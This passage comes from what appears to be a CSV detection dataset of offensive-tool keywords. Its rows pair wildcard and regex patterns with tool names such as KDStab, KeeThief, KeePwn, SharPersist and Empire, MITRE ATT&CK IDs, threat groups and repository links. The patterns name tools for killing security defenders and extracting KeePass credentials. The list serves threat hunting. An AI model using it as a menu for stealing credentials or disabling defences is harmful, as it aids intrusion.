- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50250" "*kdstab * /DRIVER*",".{0,1000}kdstab\s.{0,1000}\s\/DRIVER.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit 
- CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50251" "*kdstab * /KILL*",".{0,1000}kdstab\s.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50252" "*kdstab * /LIST*",".{0,1000}kdstab\s.{0,1000}\s\/LIST.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50253" "*kdstab * /NAME*",".{0,1000}kdstab\s.{0,1000}\s\/NAME.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50254" "*kdstab * /PID*",".{0,1000}kdstab\s.{0,1000}\s\/PID.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and 
Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50255" "*kdstab * /SERVICE*",".{0,1000}kdstab\s.{0,1000}\s\/SERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50256" "*kdstab * /STRIP*",".{0,1000}kdstab\s.{0,1000}\s\/STRIP.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50257" "*kdstab * /UNLOAD*",".{0,1000}kdstab\s.{0,1000}\s\/UNLOAD.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50258" "*kdstab.cna*",".{0,1000}kdstab\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50259" "*KeeFarceReborn.*",".{0,1000}KeeFarceReborn\..{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","50260" "*keep monitoring named pipe activities until enter is pressed*",".{0,1000}keep\smonitoring\snamed\spipe\sactivities\suntil\senter\sis\spressed.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","50261" "*KeePass config file is backdoored already*",".{0,1000}KeePass\sconfig\sfile\sis\sbackdoored\salready.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","50262" "*keepass_common_plug.*",".{0,1000}keepass_common_plug\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50263" "*keepass_discover.py*",".{0,1000}keepass_discover\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","50264" "*keepass2john *.kdbx*",".{0,1000}keepass2john\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50265" "*KeePassBackdoor.*",".{0,1000}KeePassBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","50266" "*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50267" "*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50268" 
"*-KeePassConfigTrigger*",".{0,1000}\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50269" "*KeePassHax.dll*",".{0,1000}KeePassHax\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 
- T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50270" "*KeePassLib.Keys.KcpPassword*",".{0,1000}KeePassLib\.Keys\.KcpPassword.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50271" "*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. 
just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","N/A","7","639","59","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z","50272" "*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50273" "*keepassxcfox.dll*",".{0,1000}keepassxcfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","50274" "*KeePwn --*",".{0,1000}KeePwn\s\-\-.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50275" "*KeePwn parse_dump *",".{0,1000}KeePwn\sparse_dump\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50276" "*KeePwn plugin *",".{0,1000}KeePwn\splugin\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
